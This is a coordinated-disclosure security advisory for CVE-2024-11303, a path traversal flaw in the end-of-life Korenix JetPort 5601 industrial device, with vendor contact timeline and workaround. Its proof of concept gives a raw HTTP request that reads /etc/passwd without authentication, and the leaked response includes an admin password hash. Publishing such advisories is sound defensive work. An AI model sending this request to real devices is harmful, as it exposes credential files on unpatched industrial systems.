Korenix JetPort 5601 1.2 Path Traversal

St. Pölten UAS 20241118-1-------------------------------------------------------------------------------                title| Path Traversal              product| Korenix JetPort 5601   vulnerable version| 1.2        fixed version| -           CVE number| CVE-2024-11303               impact| High             homepage| https://www.korenix.com/                found| 2024-05-24                   by| P. Oberndorfer, B. Tösch, M. Narbeshuber-Spletzer,                     | C. Hierzer, M. Pammer                     | These vulnerabilities were discovery during research at                     | St.Pölten UAS, supported and coordinated by CyberDanube.                     |                     | https://fhstp.ac.at | https://cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"Korenix Technology, a Beijer group company within the Industrial Communicationbusiness area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.With decades of experiences in the industry, we have developed various productlines [...].Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customerbase covers different Sales channels, including end-customers, OEMs, systemintegrators, and brand label partners. [...]"Source: https://www.korenix.com/en/about/index.aspx?kind=3Vulnerable versions-------------------------------------------------------------------------------Korenix JetPort 5601v3 / v1.2Vulnerability overview-------------------------------------------------------------------------------1) Path Traversal (CVE-2024-11303)A path traversal attack for unauthenticated users is possible. This allowsgetting access to the operating system of the device and access informationlike configuration files and connections to other hosts or potentially othersensitive information.Proof of Concept-------------------------------------------------------------------------------1) Path Traversal (CVE-2024-11303)By sending the following request to the following endpoint, a path traversalvulnerability can be triggered:-------------------------------------------------------------------------------GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1Host: 10.69.10.2Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Te: trailersConnection: keep-alive-------------------------------------------------------------------------------Note, that this is only possible when an interceptor proxy or a command linetool is used. A web browser would encode the characters and the path traversalwould not work.The response to the latter request is shown below:-------------------------------------------------------------------------------HTTP/1.1 200 OKServer: thttpd/2.19-MX Jun  2 2022Content-type: text/plain; charset=iso-8859-1[...]Accept-Ranges: bytesConnection: Keep-AliveContent-length: 86root::0:0:root:/root:/bin/falseadmin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true-------------------------------------------------------------------------------The vulnerabilities were manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------None. Device is End-of-Life.Workaround-------------------------------------------------------------------------------Limit the access to the device and place it within a segmented network.Recommendation-------------------------------------------------------------------------------CyberDanube recommends Korenix customers to upgrade to another device.Contact Timeline-------------------------------------------------------------------------------2024-09-23: Contacting Beijer Electronics Group via [email protected]: Vendor stated, that the device is end-of-life. Contact will ask the            engineering team if there are any changes.2024-10-15: Vendor stated, that the advisory can be published. No further            updates are planned for this device.2024-11-18: Coordinated disclosure of advisory.Web: https://www.fhstp.ac.at/Twitter: https://x.com/fh_stpoeltenMail: [email protected] T. Weber / @2024